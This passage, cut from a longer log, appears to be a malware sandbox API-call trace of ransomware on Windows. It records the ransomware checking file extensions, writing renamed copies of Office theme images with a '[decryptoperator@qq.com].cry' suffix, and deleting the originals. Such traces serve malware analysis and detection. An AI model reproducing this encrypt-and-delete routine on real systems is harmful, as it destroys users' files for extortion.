(lpString1=".zip", lpString2=".PNG") returned 1 [0044.014] lstrlenW (lpString=".rar") returned 4 [0044.014] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.014] lstrlenW (lpString=".bz2") returned 4 [0044.014] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.014] lstrlenW (lpString=".7z") returned 3 [0044.014] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0044.014] lstrlenW (lpString=".dbf") returned 4 [0044.014] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0044.014] lstrlenW (lpString=".1cd") returned 4 [0044.014] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0044.014] lstrlenW (lpString=".jpg") returned 4 [0044.014] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0044.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0044.015] lstrlenW (lpString=".doc") returned 4 [0044.015] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.015] lstrlenW (lpString=".docx") returned 5 [0044.015] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.015] lstrlenW (lpString=".pdf") returned 4 [0044.015] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.015] lstrlenW (lpString=".xls") returned 4 [0044.015] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.015] lstrlenW (lpString=".xlsx") returned 5 [0044.015] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.015] lstrlenW (lpString=".ppt") returned 4 [0044.015] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0044.015] lstrlenW (lpString=".zip") returned 4 [0044.015] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.015] lstrlenW (lpString=".rar") returned 4 [0044.015] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.015] lstrlenW (lpString=".bz2") returned 4 [0044.015] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.015] lstrlenW (lpString=".7z") returned 3 [0044.015] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0044.015] lstrlenW (lpString=".dbf") returned 4 [0044.015] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0044.015] lstrlenW (lpString=".1cd") returned 4 [0044.015] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0044.015] lstrlenW (lpString=".jpg") returned 4 [0044.015] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.016] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0044.016] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0044.016] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0044.641] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=27407) returned 1 [0044.641] CloseHandle (hObject=0x1b8) returned 1 [0044.641] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png")) returned 0x20 [0044.641] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0044.641] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0044.641] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.642] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.642] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0044.642] GetLastError () returned 0x0 [0044.642] ReadFile (in: hFile=0x1b8, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x6b0f, lpOverlapped=0x0) returned 1 [0044.657] WriteFile (in: hFile=0x1f8, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x6b10, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x6b10, lpOverlapped=0x0) returned 1 [0044.659] ReadFile (in: hFile=0x1b8, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.659] WriteFile (in: hFile=0x1f8, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0044.659] SetEndOfFile (hFile=0x1f8) returned 1 [0044.659] CloseHandle (hObject=0x1f8) returned 1 [0044.659] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.659] SetEndOfFile (hFile=0x1b8) returned 1 [0044.660] CloseHandle (hObject=0x1b8) returned 1 [0044.660] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0044.660] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\thmbnail.png")) returned 1 [0044.660] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0044.661] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0044.661] lstrlenW (lpString=".doc") returned 4 [0044.661] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.661] lstrlenW (lpString=".docx") returned 5 [0044.661] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.661] lstrlenW (lpString=".pdf") returned 4 [0044.661] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.661] lstrlenW (lpString=".xls") returned 4 [0044.661] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.661] lstrlenW (lpString=".xlsx") returned 5 [0044.661] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.661] lstrlenW (lpString=".ppt") returned 4 [0044.661] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.661] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0044.661] lstrlenW (lpString=".zip") returned 4 [0044.661] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.661] lstrlenW (lpString=".rar") returned 4 [0044.661] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.661] lstrlenW (lpString=".bz2") returned 4 [0044.661] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.661] lstrlenW (lpString=".7z") returned 3 [0044.661] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.661] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0044.661] lstrlenW (lpString=".dbf") returned 4 [0044.661] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.661] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0044.661] lstrlenW (lpString=".1cd") returned 4 [0044.661] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.661] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0044.661] lstrlenW (lpString=".jpg") returned 4 [0044.661] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.661] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0044.661] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0044.661] lstrlenW (lpString=".doc") returned 4 [0044.661] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0044.661] lstrlenW (lpString=".docx") returned 5 [0044.661] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0044.662] lstrlenW (lpString=".pdf") returned 4 [0044.662] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0044.662] lstrlenW (lpString=".xls") returned 4 [0044.662] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0044.662] lstrlenW (lpString=".xlsx") returned 5 [0044.662] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0044.662] lstrlenW (lpString=".ppt") returned 4 [0044.662] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0044.662] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0044.662] lstrlenW (lpString=".zip") returned 4 [0044.662] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0044.662] lstrlenW (lpString=".rar") returned 4 [0044.662] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0044.662] lstrlenW (lpString=".bz2") returned 4 [0044.662] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0044.662] lstrlenW (lpString=".7z") returned 3 [0044.662] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0044.662] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0044.662] lstrlenW (lpString=".dbf") returned 4 [0044.662] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0044.662] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0044.662] lstrlenW (lpString=".1cd") returned 4 [0044.662] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0044.662] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\THMBNAIL.PNG") returned 77 [0044.662] lstrlenW (lpString=".jpg") returned 4 [0044.662] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0044.662] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0044.662] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0044.662] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0044.663] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=1363) returned 1 [0044.663] CloseHandle (hObject=0x1b8) returned 1 [0044.663] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif")) returned 0x20 [0044.663] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0044.663] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0044.663] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.663] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.663] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0044.678] GetLastError () returned 0x0 [0044.678] ReadFile (in: hFile=0x1b8, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x553, lpOverlapped=0x0) returned 1 [0044.971] WriteFile (in: hFile=0x1f8, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x560, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x560, lpOverlapped=0x0) returned 1 [0044.972] ReadFile (in: hFile=0x1b8, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.972] WriteFile (in: hFile=0x1f8, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.972] SetEndOfFile (hFile=0x1f8) returned 1 [0044.972] CloseHandle (hObject=0x1f8) returned 1 [0044.972] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.972] SetEndOfFile (hFile=0x1b8) returned 1 [0044.973] CloseHandle (hObject=0x1b8) returned 1 [0044.973] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0044.973] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\cascade\\preview.gif")) returned 1 [0044.973] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0044.973] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0044.973] lstrlenW (lpString=".doc") returned 4 [0044.973] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.973] lstrlenW (lpString=".docx") returned 5 [0044.973] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.973] lstrlenW (lpString=".pdf") returned 4 [0044.974] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.974] lstrlenW (lpString=".xls") returned 4 [0044.974] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.974] lstrlenW (lpString=".xlsx") returned 5 [0044.974] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.974] lstrlenW (lpString=".ppt") returned 4 [0044.974] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.974] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0044.974] lstrlenW (lpString=".zip") returned 4 [0044.974] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.974] lstrlenW (lpString=".rar") returned 4 [0044.974] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.974] lstrlenW (lpString=".bz2") returned 4 [0044.974] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.974] lstrlenW (lpString=".7z") returned 3 [0044.974] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.974] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0044.974] lstrlenW (lpString=".dbf") returned 4 [0044.974] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.974] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0044.974] lstrlenW (lpString=".1cd") returned 4 [0044.974] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.974] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0044.974] lstrlenW (lpString=".jpg") returned 4 [0044.974] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.974] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0044.974] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0044.974] lstrlenW (lpString=".doc") returned 4 [0044.974] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.974] lstrlenW (lpString=".docx") returned 5 [0044.974] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.974] lstrlenW (lpString=".pdf") returned 4 [0044.974] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.974] lstrlenW (lpString=".xls") returned 4 [0044.974] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.974] lstrlenW (lpString=".xlsx") returned 5 [0044.974] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.975] lstrlenW (lpString=".ppt") returned 4 [0044.975] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0044.975] lstrlenW (lpString=".zip") returned 4 [0044.975] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.975] lstrlenW (lpString=".rar") returned 4 [0044.975] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.975] lstrlenW (lpString=".bz2") returned 4 [0044.975] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.975] lstrlenW (lpString=".7z") returned 3 [0044.975] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0044.975] lstrlenW (lpString=".dbf") returned 4 [0044.975] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0044.975] lstrlenW (lpString=".1cd") returned 4 [0044.975] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.975] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CASCADE\\PREVIEW.GIF") returned 75 [0044.975] lstrlenW (lpString=".jpg") returned 4 [0044.975] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.975] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0044.975] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0044.975] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0044.984] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=25106) returned 1 [0044.984] CloseHandle (hObject=0x1f8) returned 1 [0044.984] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png")) returned 0x20 [0044.986] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0044.986] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0044.986] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.986] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.986] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0044.987] GetLastError () returned 0x0 [0044.987] ReadFile (in: hFile=0x1b8, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x6212, lpOverlapped=0x0) returned 1 [0044.989] WriteFile (in: hFile=0x188, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x6220, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x6220, lpOverlapped=0x0) returned 1 [0044.990] ReadFile (in: hFile=0x1b8, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.990] WriteFile (in: hFile=0x188, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0045.004] SetEndOfFile (hFile=0x188) returned 1 [0045.004] CloseHandle (hObject=0x188) returned 1 [0045.004] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.004] SetEndOfFile (hFile=0x1b8) returned 1 [0045.005] CloseHandle (hObject=0x1b8) returned 1 [0045.005] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0045.005] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png")) returned 1 [0045.006] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0045.006] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0045.006] lstrlenW (lpString=".doc") returned 4 [0045.006] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.006] lstrlenW (lpString=".docx") returned 5 [0045.006] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.006] lstrlenW (lpString=".pdf") returned 4 [0045.006] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.006] lstrlenW (lpString=".xls") returned 4 [0045.006] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.006] lstrlenW (lpString=".xlsx") returned 5 [0045.006] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.006] lstrlenW (lpString=".ppt") returned 4 [0045.006] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.006] lstrlenW (lpString="C:\\Program 